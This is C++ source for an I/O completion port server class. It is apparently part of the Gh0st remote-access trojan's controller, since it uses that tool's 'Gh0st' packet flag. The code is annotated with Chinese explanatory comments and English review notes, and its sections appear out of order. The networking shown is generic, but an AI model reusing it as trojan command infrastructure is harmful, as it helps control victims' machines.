		pContext->m_WriteBuffer.Delete(dwIoSize);
		if (pContext->m_WriteBuffer.GetBufferLen() == 0)
		{
			// Everything went out: reset the buffer and release Send().
			pContext->m_WriteBuffer.ClearBuffer();
			// Write complete
			SetEvent(pContext->m_hWriteComplete);
			return true; // issue new read after this one
		}
		else
		{
			// More to send: queue another overlapped write for the remainder.
			OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
			m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_TRANSMIT);
			pContext->m_wsaOutBuffer.buf = (char*) pContext->m_WriteBuffer.GetBuffer();
			pContext->m_wsaOutBuffer.len = pContext->m_WriteBuffer.GetBufferLen();
			// NOTE(review): &m_wsaOutBuffer.len is passed both as the buffer
			// length (inside the WSABUF) and as lpNumberOfBytesSent - the
			// immediate-completion byte count overwrites the stored length.
			// Appears intentional but confirm against the WSASend contract.
			int nRetVal = WSASend(pContext->m_Socket,
							&pContext->m_wsaOutBuffer,
							1,
							&pContext->m_wsaOutBuffer.len,
							ulFlags,
							&pOverlap->m_ol,
							NULL);
			// Anything other than "pending" means the peer is gone.
			if ( nRetVal == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING )
			{
				RemoveStaleClient( pContext, FALSE );
			}
		}
	}catch(...){}
	return false; // issue new read after this one
}
//
// FUNCTION: CIOCPServer::CloseCompletionPort
//
// DESCRIPTION: Close down the IO Complete Port, queue and associated client context structs
// which in turn will close the sockets...
//
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::CloseCompletionPort()
{
	// Wake each worker with a NULL-key completion packet until they have
	// all exited (each worker decrements m_nWorkerCnt on its way out).
	while (m_nWorkerCnt)
	{
		PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) NULL, NULL);
		Sleep(100);
	}

	// With the workers gone, the port handle can be closed; no further
	// requests will be queued.
	CloseHandle(m_hCompletionPort);

	// Tear down every remaining client context.
	ClientContext* pContext = NULL;
	while (!m_listContexts.IsEmpty())
	{
		POSITION pos = m_listContexts.GetHeadPosition();
		if (pos == NULL)
			break;
		pContext = m_listContexts.GetNext(pos);
		RemoveStaleClient(pContext, FALSE);
	}
	m_listContexts.RemoveAll();
}
/*实现完成端口与套接字的绑定,并返回完成端口*/
BOOL CIOCPServer::AssociateSocketWithCompletionPort(SOCKET socket, HANDLE hCompletionPort, DWORD dwCompletionKey)
{
	// Attach the socket to the existing completion port; on success
	// CreateIoCompletionPort returns the port handle itself.
	HANDLE hPort = CreateIoCompletionPort((HANDLE) socket, hCompletionPort, dwCompletionKey, 0);
	return (hPort == hCompletionPort) ? TRUE : FALSE;
}
//
// FUNCTION: CIOCPServer::RemoveStaleClient
//
// DESCRIPTION: Client has died on us, close socket and remove context from our list
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::RemoveStaleClient(ClientContext* pContext, BOOL bGraceful)
{
	// Closes a dead (or to-be-dropped) client's socket, notifies the
	// owner, and recycles the context into the free pool.
	// bGraceful == FALSE forces an abortive close (RST, no TIME_WAIT):
	// SO_LINGER with l_onoff=1, l_linger=0 discards unsent data on
	// closesocket instead of lingering to flush it.
	CLock cs(m_cs, "RemoveStaleClient"); // serialize list access
	TRACE("CIOCPServer::RemoveStaleClient\n");
	LINGER lingerStruct;
	//
	// If we're supposed to abort the connection, set the linger value
	// on the socket to 0 (hard close).
	//
	if ( !bGraceful )
	{
		lingerStruct.l_onoff = 1;
		lingerStruct.l_linger = 0;
		setsockopt( pContext->m_Socket, SOL_SOCKET, SO_LINGER,
				(char *)&lingerStruct, sizeof(lingerStruct) );
	}
	//
	// Free context structures - only if the context is still tracked
	// (guards against double removal).
	if (m_listContexts.Find(pContext))
	{
		//
		// Cancel any overlapped IO still pending on the socket, then close
		// it (abortive or graceful per the linger setting above).
		CancelIo((HANDLE) pContext->m_Socket);
		closesocket( pContext->m_Socket );
		pContext->m_Socket = INVALID_SOCKET;
		// Spin until the outstanding overlapped operation reports complete.
		// NOTE(review): pContext is cast directly to LPOVERLAPPED, so this
		// inspects whatever sits at the start of ClientContext as if it were
		// OVERLAPPED.Internal - confirm ClientContext's layout makes this valid.
		while (!HasOverlappedIoCompleted((LPOVERLAPPED)pContext))
			Sleep(0);
		// Tell the owner the client is gone (removes it from the UI list).
		m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_DISCONNECT);
		// Park the context in the free pool for reuse.
		MoveToFreePool(pContext);
	}
}
void CIOCPServer::Shutdown()
{
	// Full teardown: stop the listener, drain and close the completion
	// port, free pooled contexts. A no-op unless Initialize() succeeded,
	// so it is safe to call from the destructor unconditionally.
	if (m_bInit == false)
		return;

	m_bInit = false;
	m_bTimeToKill = true; // workers poll this flag and leave their loops

	// Stop the listener thread first so no new clients arrive.
	Stop();

	closesocket(m_socListen);
	WSACloseEvent(m_hEvent);

	// Drain the worker pool and close the port, then drop the lock object.
	CloseCompletionPort();
	DeleteCriticalSection(&m_cs);

	// Release every context parked in the free pool.
	while (!m_listFreePool.IsEmpty())
		delete m_listFreePool.RemoveTail();
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Checks free pool otherwise allocates a context
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::MoveToFreePool(ClientContext *pContext)
{
	// Recycle a context: wipe its buffers and park it in the free pool so
	// AllocateContext can reuse it for the next connection.
	CLock cs(m_cs, "MoveToFreePool"); // serialize list access

	POSITION pos = m_listContexts.Find(pContext);
	if (pos == NULL)
		return; // not tracked (already recycled)

	pContext->m_CompressionBuffer.ClearBuffer();
	pContext->m_WriteBuffer.ClearBuffer();
	pContext->m_DeCompressionBuffer.ClearBuffer();
	pContext->m_ResendWriteBuffer.ClearBuffer();

	m_listFreePool.AddTail(pContext);
	m_listContexts.RemoveAt(pos);
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Moves an 'used/stale' Context to the free pool for reuse
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Called after a client connection is accepted; returns a pointer to a ClientContext for it.
ClientContext* CIOCPServer::AllocateContext()
{
	// Returns a ClientContext for a freshly accepted connection, reusing
	// a pooled one when available (see MoveToFreePool) or allocating anew.
	// May return NULL if allocation fails.
	ClientContext* pContext = NULL;
	CLock cs(CIOCPServer::m_cs, "AllocateContext"); // serialize pool access
	if (!m_listFreePool.IsEmpty())
	{
		pContext = m_listFreePool.RemoveHead(); // reuse a recycled context
	}
	else
	{
		pContext = new ClientContext; // pool empty - allocate a fresh one
	}
	ASSERT(pContext);
	if (pContext != NULL)
	{
		// NOTE(review): ZeroMemory over a non-POD C++ object blanks every
		// member wholesale. For a recycled context this also wipes any
		// pointers/handles the member buffers and m_hWriteComplete still
		// own (potential leak) - confirm ClientContext is safe to zero.
		ZeroMemory(pContext, sizeof(ClientContext));
		pContext->m_bIsMainSocket = false; // not the primary control socket
		memset(pContext->m_Dialog, 0, sizeof(pContext->m_Dialog)); // clear dialog slots
	}
	return pContext;
}
//重新连接前需要移除他的链表,不中止SOKET连接
void CIOCPServer::ResetConnection(ClientContext* pContext)
{
	// Gracefully drop a single client (bGraceful TRUE, so no abortive
	// linger) - but only if it is still present in the live-context list.
	CString strHost;
	ClientContext* pCompContext = NULL;
	CLock cs(CIOCPServer::m_cs, "ResetConnection");

	for (POSITION pos = m_listContexts.GetHeadPosition(); pos != NULL; )
	{
		pCompContext = m_listContexts.GetNext(pos);
		if (pCompContext == pContext)
		{
			RemoveStaleClient(pContext, TRUE);
			break;
		}
	}
}
void CIOCPServer::DisconnectAll()
{
	// Raise the sentinel so OnAccept refuses new clients while we sweep,
	// then gracefully remove every live client context.
	m_bDisconnectAll = true;
	CString strHost;
	ClientContext* pContext = NULL;
	CLock cs(CIOCPServer::m_cs, "DisconnectAll");

	for (POSITION pos = m_listContexts.GetHeadPosition(); pos != NULL; )
	{
		pContext = m_listContexts.GetNext(pos);
		RemoveStaleClient(pContext, TRUE);
	}
	m_bDisconnectAll = false;
}
//简单返回
bool CIOCPServer::IsRunning()
{
	// True once Initialize() has succeeded and Shutdown() has not yet run.
	return m_bInit;
}
// Questions are welcome - the annotations in this file reflect the annotator's personal understanding; corrections appreciated.
//
//
#include "stdafx.h"
#include "IOCPServer.h"
#include "../MainFrm.h"
#include "zlib/zlib.h"
#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#define new DEBUG_NEW
#endif
// Change at your Own Peril
// 'G' 'h' '0' 's' 't' | PacketLen | UnZipLen
#define HDR_SIZE 13
#define FLAG_SIZE 5
#define HUERISTIC_VALUE 2
CRITICAL_SECTION CIOCPServer::m_cs;
//
// Construction/Destruction
//
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: C'tor initializes Winsock2 and miscelleanous events etc.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Constructor: brings up Winsock and puts every member into a known idle
// state. The real work (listen socket, completion port, worker threads)
// happens later in Initialize().
CIOCPServer::CIOCPServer()
{
TRACE("CIOCPServer=%p\n",this);
//
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);// initialise Winsock, requesting version 2.2
InitializeCriticalSection(&m_cs);// guards the context lists (m_cs is a class-wide static)
m_hThread = NULL;// listener thread handle
m_hKillEvent = CreateEvent(NULL, TRUE, FALSE, NULL);// manual-reset event used to stop the listener thread
m_socListen = NULL;// listening socket
m_bTimeToKill = false;// set when all worker threads should exit
m_bDisconnectAll = false;// sentinel raised while DisconnectAll() tears down connections
m_hEvent = NULL;// WSA event signalled on FD_ACCEPT
m_hCompletionPort= NULL;// IO completion port handle
m_bInit = false;// becomes true once Initialize() succeeds
m_nCurrentThreads = 0;// number of worker threads serving the completion port
m_nBusyThreads = 0;// workers currently processing a completion
m_nSendKbps = 0;// outbound throughput sample
m_nRecvKbps = 0;// inbound throughput sample
m_nMaxConnections = 10000;// connection cap (overwritten by Initialize)
m_nKeepLiveTime = 1000 * 60 * 3; // TCP keep-alive idle time: first probe after 3 minutes
// Packet Flag;
BYTE bPacketFlag[] = {'G', 'h', '0', 's', 't'}; // wire signature - must match the client side byte for byte
memcpy(m_bPacketFlag, bPacketFlag, sizeof(bPacketFlag));// keep a copy for framing/validation
}
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: Tidy up
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
///析构函数中关闭完成端口,卸载套接字库的使用,跟进shutdown函数/
// Destructor: shuts the completion port machinery down and unloads Winsock.
// Any exception during teardown is deliberately swallowed - there is
// nothing useful to do with it while destructing.
CIOCPServer::~CIOCPServer()
{
try
{
Shutdown();
WSACleanup();
}catch(...){}
}
//
// FUNCTION: Init
//
// DESCRIPTION: Starts listener into motion
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Brings the server up: creates the overlapped listen socket, registers
// FD_ACCEPT notification, binds and listens on nPort, starts the listener
// thread and initialises the completion port + worker pool.
//
// pNotifyProc      callback invoked on connect/receive/transmit/disconnect
// pFrame           owner frame passed back through the callback
// nMaxConnections  connection cap stored in m_nMaxConnections
// nPort            TCP port to listen on
// Returns true on success; on failure every resource acquired so far is
// released (the original leaked m_hEvent on several failure paths).
bool CIOCPServer::Initialize(NOTIFYPROC pNotifyProc, CMainFrame* pFrame, int nMaxConnections, int nPort)
{
m_pNotifyProc = pNotifyProc;
m_pFrame = pFrame;
m_nMaxConnections = nMaxConnections;
// Overlapped socket so it can participate in completion-port IO.
m_socListen = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED);
if (m_socListen == INVALID_SOCKET)
{
TRACE(_T("Could not create listen socket %ld\n"),WSAGetLastError());
return false;
}
// Event for handling Network IO
m_hEvent = WSACreateEvent();
if (m_hEvent == WSA_INVALID_EVENT)
{
TRACE(_T("WSACreateEvent() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);
return false;
}
// The listener is ONLY interested in FD_ACCEPT
// That is when a client connects to or IP/Port
// Request async notification
int nRet = WSAEventSelect(m_socListen,
m_hEvent,
FD_ACCEPT);
if (nRet == SOCKET_ERROR)
{
TRACE(_T("WSAAsyncSelect() error %ld\n"),WSAGetLastError());
// FIX: also release the event created above (the original leaked it).
WSACloseEvent(m_hEvent);
closesocket(m_socListen);
return false;
}
SOCKADDR_IN saServer;
// FIX: zero the whole structure so sin_zero is not left uninitialised.
memset(&saServer, 0, sizeof(saServer));
// Listen on our designated Port#
saServer.sin_port = htons(nPort);
// Fill in the rest of the address structure
saServer.sin_family = AF_INET;
saServer.sin_addr.s_addr = INADDR_ANY;
// bind our name to the socket
nRet = bind(m_socListen,
(LPSOCKADDR)&saServer,
sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR)
{
TRACE(_T("bind() error %ld\n"),WSAGetLastError());
WSACloseEvent(m_hEvent);
closesocket(m_socListen);
return false;
}
// Set the socket to listen
nRet = listen(m_socListen, SOMAXCONN);
if (nRet == SOCKET_ERROR)
{
TRACE(_T("listen() error %ld\n"),WSAGetLastError());
WSACloseEvent(m_hEvent);
closesocket(m_socListen);
return false;
}
UINT dwThreadId = 0;
// Start the accept loop (ListenThreadProc), then the completion port.
m_hThread =
(HANDLE)_beginthreadex(NULL, // Security
0, // Stack size - use default
ListenThreadProc, // Thread fn entry point
(void*) this,
0, // Init flag
&dwThreadId); // Thread address
// FIX: _beginthreadex() returns NULL (0) on failure, not
// INVALID_HANDLE_VALUE - the original test accepted a failed creation.
if (m_hThread != NULL)
{
InitializeIOCP();// NOTE(review): return value historically ignored here
m_bInit = true;
return true;
}
// Thread creation failed - release everything acquired above.
WSACloseEvent(m_hEvent);
closesocket(m_socListen);
return false;
}
//
// FUNCTION: CIOCPServer::ListenThreadProc
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Accept loop: polls the kill event, waits for FD_ACCEPT on the listen
// socket and dispatches each pending connection to OnAccept().
unsigned CIOCPServer::ListenThreadProc(LPVOID lParam) //监听线程
{
CIOCPServer* pThis = reinterpret_cast<CIOCPServer*>(lParam);// recover the instance passed to _beginthreadex
WSANETWORKEVENTS events;// filled in by WSAEnumNetworkEvents below
while(1)
{
//
// Wait for something to happen
// Poll the kill event every 100 ms; Stop() signals it to end this thread.
if (WaitForSingleObject(pThis->m_hKillEvent, 100) == WAIT_OBJECT_0)
break;
DWORD dwRet;
// Wait up to 100 ms for the FD_ACCEPT event registered via WSAEventSelect.
dwRet = WSAWaitForMultipleEvents(1,
&pThis->m_hEvent,
FALSE,
100,
FALSE);
if (dwRet == WSA_WAIT_TIMEOUT)// nothing happened - loop and re-check the kill event
continue;
//
// Figure out what happened
// Enumerate pending network events on the listen socket (also resets m_hEvent).
int nRet = WSAEnumNetworkEvents(pThis->m_socListen,
pThis->m_hEvent,
&events);
if (nRet == SOCKET_ERROR)// enumeration failed - abandon the accept loop
{
TRACE(_T("WSAEnumNetworkEvents error %ld\n"),WSAGetLastError());
break;
}
// Handle Network events //
// ACCEPT
// Only FD_ACCEPT was registered, but check the mask defensively.
if (events.lNetworkEvents & FD_ACCEPT)
{
if (events.iErrorCode[FD_ACCEPT_BIT] == 0)// no accept-level error recorded
pThis->OnAccept();
else
{
TRACE(_T("Unknown network event error %ld\n"),WSAGetLastError());// accept-level error - stop listening
break;
}
}
} // while....
return 0; // Normal Thread Exit Code...
}
//
// FUNCTION: CIOCPServer::OnAccept
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09072001 Changes for OVERLAPPEDPLUS
void CIOCPServer::OnAccept()
{
SOCKADDR_IN SockAddr;//定义SOCKADDR_IN结构对象
SOCKET clientSocket;//定义一个clientSocket套接字
int nRet;
int nLen;
if (m_bTimeToKill || m_bDisconnectAll)//如果要结束掉完成端口上所有的线程或者断开所有连接时,此函数退出
return;
//
// accept the new socket descriptor
//检测到有主机连接时调用accept并建立与之通信的套接字
nLen = sizeof(SOCKADDR_IN);
clientSocket = accept(m_socListen,
(LPSOCKADDR)&SockAddr,
&nLen);
if (clientSocket == SOCKET_ERROR)//接收失败
{
nRet = WSAGetLastError();//获取错误代码
if (nRet != WSAEWOULDBLOCK)//不等于WSAEWOULDBLOCK真的发生错误
{
//
// Just log the error and return
//
TRACE(_T("accept() error\n"),WSAGetLastError());
return;
}
}
// Create the Client context to be associted with the completion port
//定义一个指向ClientContext结构的指针,并调用函数进行赋值,我们跟进此函数!
ClientContext* pContext = AllocateContext();
// AllocateContext fail
if (pContext == NULL)//创建失败
return;
//将连接的套接字保存在上下文中
pContext->m_Socket = clientSocket;
// Fix up In Buffer
//对结构中接收的缓冲区赋值大小为8192
pContext->m_wsaInBuffer.buf = (char*)pContext->m_byInBuffer;
pContext->m_wsaInBuffer.len = sizeof(pContext->m_byInBuffer);
// Associate the new socket with a completion port.
//判断完成端口是否绑定成功
if (!AssociateSocketWithCompletionPort(clientSocket, m_hCompletionPort, (DWORD) pContext))//关联失败
{
//失败时删除这个指针并置为空,关闭连接用的套接字。关闭监听套接字,并返回
delete pContext;
pContext = NULL;
closesocket( clientSocket );
closesocket( m_socListen );
return;
}
// 关闭nagle算法,以免影响性能,因为控制时控制端要发送很多数据量很小的数据包,要求马上发送
// 暂不关闭,实验得知能网络整体性能有很大影响
const char chOpt = 1;
// int nErr = setsockopt(pContext->m_Socket, IPPROTO_TCP, TCP_NODELAY, &chOpt, sizeof(char));
// if (nErr == -1)
// {
// TRACE(_T("setsockopt() error\n"),WSAGetLastError());
// return;
// }
// Set KeepAlive 开启保活机制
//对于 socket 非正常断开
//设置套接字的属性,并赋予它保活机制,如果设置错误获取错误代码
if (setsockopt(pContext->m_Socket, SOL_SOCKET, SO_KEEPALIVE, (char *)&chOpt, sizeof(chOpt)) != 0)//发生错误
{
TRACE(_T("setsockopt() error\n"), WSAGetLastError());
}
// 设置超时详细信息
tcp_keepalive klive;
klive.onoff = 1; // 启用保活
klive.keepalivetime = m_nKeepLiveTime; // 开始首次 KeepAlive 探测前的 TCP 空闭时间 3分钟一次
klive.keepaliveinterval = 1000 * 10; // 重试间隔为10秒 Resend if No-Reply
WSAIoctl
(
pContext->m_Socket,
SIO_KEEPALIVE_VALS,
&klive,
sizeof(tcp_keepalive),
NULL,
0,
(unsigned long *)&chOpt,
0,
NULL
);
CLock cs(m_cs, "OnAccept" );;//加入链表之前要进行共享资源访问的控制在此调用CLock类
// Hold a reference to the context
m_listContexts.AddTail(pContext);//把上下文加入上下文列表,每有一个连接就建立一个上下文并加入列表
// Trigger first IO Completion Request
// Otherwise the Worker thread will remain blocked waiting for GetQueuedCompletionStatus...
// The first message that gets queued up is ClientIoInitializing - see ThreadPoolFunc and
// IO_MESSAGE_HANDLER
//动态新建一个OVERLAPPEDPLUS结构并初始化IOType类型为IOInitialize
OVERLAPPEDPLUS *pOverlap = new OVERLAPPEDPLUS(IOInitialize);
//向一个已经初始完的I/O端口发送数据包操作类型为IOInitialize,触发GetQueuedCompletionStatus功能调用函数来取得数据包
BOOL bSuccess = PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
if ( (!bSuccess && GetLastError( ) != ERROR_IO_PENDING))//发送失败
{
RemoveStaleClient(pContext,TRUE);
return;
}
//我们看一下NC_CLIENT_CONNECT实现了什么都没做
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_CONNECT);//调用回调函数发送NC_CLINET_CONECT这个参数,跟踪得知什么都没做
// Post to WSARecv Next
PostRecv(pContext);//抛出接受的请求,跟进函数
}
//
// FUNCTION: CIOCPServer::InitializeIOCP
//
// DESCRIPTION: Create a dummy socket and associate a completion port with it.
// once completion port is create we can dicard the socket
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Creates the IO completion port and spins up the worker-thread pool
// (2 x number of processors). Returns false if the port or any worker
// thread could not be created.
bool CIOCPServer::InitializeIOCP(void)
{
SOCKET s;
DWORD i;
UINT nThreadID;
SYSTEM_INFO systemInfo;
//
// First open a temporary socket that we will use to create the
// completion port. In NT 3.51 it will not be necessary to specify
// the FileHandle parameter of CreateIoCompletionPort()--it will
// be legal to specify FileHandle as NULL. However, for NT 3.5
// we need an overlapped file handle.
//
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);// throwaway socket, only needed to create the port
if ( s == INVALID_SOCKET )
return false;
// Create the completion port that will be used by all the worker
// threads. (Modern alternative: CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0).)
m_hCompletionPort = CreateIoCompletionPort( (HANDLE)s, NULL, 0, 0 );
if ( m_hCompletionPort == NULL ) // creation failed - release the socket
{
closesocket( s );
return false;
}
// Close the socket, we don't need it any longer.
closesocket( s );
// Determine how many processors are on the system.
GetSystemInfo( &systemInfo );
m_nThreadPoolMin = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;// floor for the dynamic pool (see ThreadPoolFunc)
m_nThreadPoolMax = m_nThreadPoolMin;// ceiling - pool growth is currently disabled
m_nCPULoThreshold = 10; // CPU% below which idle workers may retire
m_nCPUHiThreshold = 75; // CPU% above which the pool would grow
m_cpu.Init();// start CPU usage sampling
// We use two worker threads for each processor on the system--this is chosen as a good balance
// that ensures that there are a sufficient number of threads available to get useful work done
// but not too many that context switches consume significant overhead.
UINT nWorkerCnt = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;
// We need to save the Handles for Later Termination...
HANDLE hWorker;
m_nWorkerCnt = 0;
// Start the workers; each runs ThreadPoolFunc until shutdown.
for ( i = 0; i < nWorkerCnt; i++ )
{
hWorker = (HANDLE)_beginthreadex(NULL, // Security
0, // Stack size - use default
ThreadPoolFunc, // Thread fn entry point
(void*) this, // Param for thread
0, // Init flag
&nThreadID); // Thread address
if (hWorker == NULL ) // creation failed - abandon initialisation
{
CloseHandle( m_hCompletionPort );
return false;
}
m_nWorkerCnt++;// workers decrement this as they exit (see CloseCompletionPort)
CloseHandle(hWorker);// drop our reference; the thread keeps running
}
return true;
}
//
// FUNCTION: CIOCPServer::ThreadPoolFunc
//
// DESCRIPTION: This is the main worker routine for the worker threads.
// Worker threads wait on a completion port for I/O to complete.
// When it completes, the worker thread processes the I/O, then either pends
// new I/O or closes the client's connection. When the service shuts
// down, other code closes the completion port which causes
// GetQueuedCompletionStatus() to wake up and the worker thread then
// exits.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
// Worker thread: blocks on the completion port, dispatches each dequeued
// IO completion to ProcessIOMessage, and participates in the dynamic
// pool-sizing logic (shrink when idle; growth is compiled out).
unsigned CIOCPServer::ThreadPoolFunc (LPVOID thisContext) //工作者线程函数起始位置
{
// Get back our pointer to the class
ULONG ulFlags = MSG_PARTIAL;
CIOCPServer* pThis = reinterpret_cast<CIOCPServer*>(thisContext);// server instance passed at thread creation
ASSERT(pThis);
HANDLE hCompletionPort = pThis->m_hCompletionPort;// local copy of the port handle
DWORD dwIoSize;
LPOVERLAPPED lpOverlapped;// raw OVERLAPPED returned by GetQueuedCompletionStatus
ClientContext* lpClientContext;// completion key = per-connection context
OVERLAPPEDPLUS* pOverlapPlus;// enclosing record carrying the IO operation type
bool bError;
bool bEnterRead;
InterlockedIncrement(&pThis->m_nCurrentThreads);// pool bookkeeping
InterlockedIncrement(&pThis->m_nBusyThreads);
//
// Loop round and round servicing I/O completions.
// Leaves only when bStayInPool drops (idle shrink) or m_bTimeToKill is raised.
for (BOOL bStayInPool = TRUE; bStayInPool && pThis->m_bTimeToKill == false; )
{
pOverlapPlus = NULL;
lpClientContext = NULL;
bError = false;
bEnterRead = false;
// Thread is Block waiting for IO completion
InterlockedDecrement(&pThis->m_nBusyThreads);// about to block - no longer "busy"
// Get a completed IO request.
BOOL bIORet = GetQueuedCompletionStatus(
hCompletionPort,
&dwIoSize,
(LPDWORD) &lpClientContext,
&lpOverlapped, INFINITE);
DWORD dwIOError = GetLastError();// capture before any other call clobbers it
// Widen the OVERLAPPED pointer to its enclosing OVERLAPPEDPLUS record so the
// m_ioType tag is available for dispatch.
pOverlapPlus = CONTAINING_RECORD(lpOverlapped, OVERLAPPEDPLUS, m_ol);
int nBusyThreads = InterlockedIncrement(&pThis->m_nBusyThreads);
if (!bIORet && dwIOError != WAIT_TIMEOUT )// failed dequeue that is not a timeout
{
if (lpClientContext && pThis->m_bTimeToKill == false)// a client connection really failed - reap it
{
pThis->RemoveStaleClient(lpClientContext, FALSE);
}
continue;
// NOTE(review): unreachable - the continue above skips this assignment,
// and pOverlapPlus is not freed on this path.
bError = true;
}
if (!bError) // completion dequeued (or timed out) - pool management first
{
// Allocate another thread to the thread Pool?
// Dynamic growth based on CPU load (thread creation is commented out).
if (nBusyThreads == pThis->m_nCurrentThreads)// every worker is busy
{
if (nBusyThreads < pThis->m_nThreadPoolMax)// still below the pool ceiling
{
if (pThis->m_cpu.GetUsage() > pThis->m_nCPUHiThreshold)// and the CPU is saturated
{
UINT nThreadID = -1;
// Pool growth disabled: creation left commented out.
// HANDLE hThread = (HANDLE)_beginthreadex(NULL, // Security
// 0, // Stack size - use default
// ThreadPoolFunc, // Thread fn entry point
/// (void*) pThis,
// 0, // Init flag
// &nThreadID); // Thread address
// CloseHandle(hThread);
}
}
}
// Thread timed out - IDLE?
if (!bIORet && dwIOError == WAIT_TIMEOUT)// dequeue timed out
{
if (lpClientContext == NULL)// no client attached - candidate for pool shrink
{
if (pThis->m_cpu.GetUsage() < pThis->m_nCPULoThreshold)// system is idle
{
// Thread has no outstanding IO - Server hasn't much to do so die
if (pThis->m_nCurrentThreads > pThis->m_nThreadPoolMin)// keep at least the minimum
bStayInPool = FALSE;
}
bError = true;
}
}
}
//
//
if (!bError)// normal completion - dispatch on the operation type
{
if(bIORet && NULL != pOverlapPlus && NULL != lpClientContext)
{
try
{
pThis->ProcessIOMessage(pOverlapPlus->m_ioType, lpClientContext, dwIoSize);// IOInitialize/IORead/IOWrite handler
}
catch (...) {}
}
}
// Free the completed request record.
if(pOverlapPlus)
delete pOverlapPlus; // from previous call
}
InterlockedDecrement(&pThis->m_nWorkerCnt);
InterlockedDecrement(&pThis->m_nCurrentThreads);
InterlockedDecrement(&pThis->m_nBusyThreads);
return 0;
}
//
// FUNCTION: CIOCPServer::Stop
//
// DESCRIPTION: Signal the listener to quit his thread
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Stops the accept loop: signals the kill event, waits for the listener
// thread to exit, then releases both handles. Worker threads are stopped
// separately via Shutdown()/CloseCompletionPort().
void CIOCPServer::Stop()
{
::SetEvent(m_hKillEvent);
WaitForSingleObject(m_hThread, INFINITE);// block until ListenThreadProc returns
CloseHandle(m_hThread);
CloseHandle(m_hKillEvent);
}
//
// FUNCTION: CIOCPServer::GetHostName
//
// DESCRIPTION: Get the host name of the connect client
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Returns the peer IP address of the given connected socket.
// Resolves the remote (peer) IPv4 address of a connected socket as a
// dotted-quad string; returns an empty string on failure.
CString CIOCPServer::GetHostName(SOCKET socket)
{
sockaddr_in sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
int nSockAddrLen = sizeof(sockAddr);
// FIX: getpeername() returns 0 on success and SOCKET_ERROR on failure;
// the original stored the result in a BOOL and compared it against
// INVALID_SOCKET, which only worked by accident of integer conversion.
int nResult = getpeername(socket,(SOCKADDR*)&sockAddr, &nSockAddrLen);
return nResult == 0 ? inet_ntoa(sockAddr.sin_addr) : "";
}
// Posts an overlapped WSARecv on the client's socket; the completion
// surfaces in ThreadPoolFunc as an IORead message handled by OnClientReading().
void CIOCPServer::PostRecv(ClientContext* pContext)
{
// issue a read request
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IORead);// freed by the worker after the completion is processed
ULONG ulFlags = MSG_PARTIAL;
DWORD dwNumberOfBytesRecvd;
UINT nRetVal = WSARecv(pContext->m_Socket, // receive into the context's inline buffer
&pContext->m_wsaInBuffer,
1,
&dwNumberOfBytesRecvd,
&ulFlags,
&pOverlap->m_ol,
NULL);
// Anything other than "pending" is a hard failure - abort the connection
// (bGraceful == FALSE forces an abortive close).
if ( nRetVal == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING)
{
RemoveStaleClient(pContext, FALSE);
}
}
//
// FUNCTION: CIOCPServer::Send
//
// DESCRIPTION: Posts a Write + Data to IO CompletionPort for transfer
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
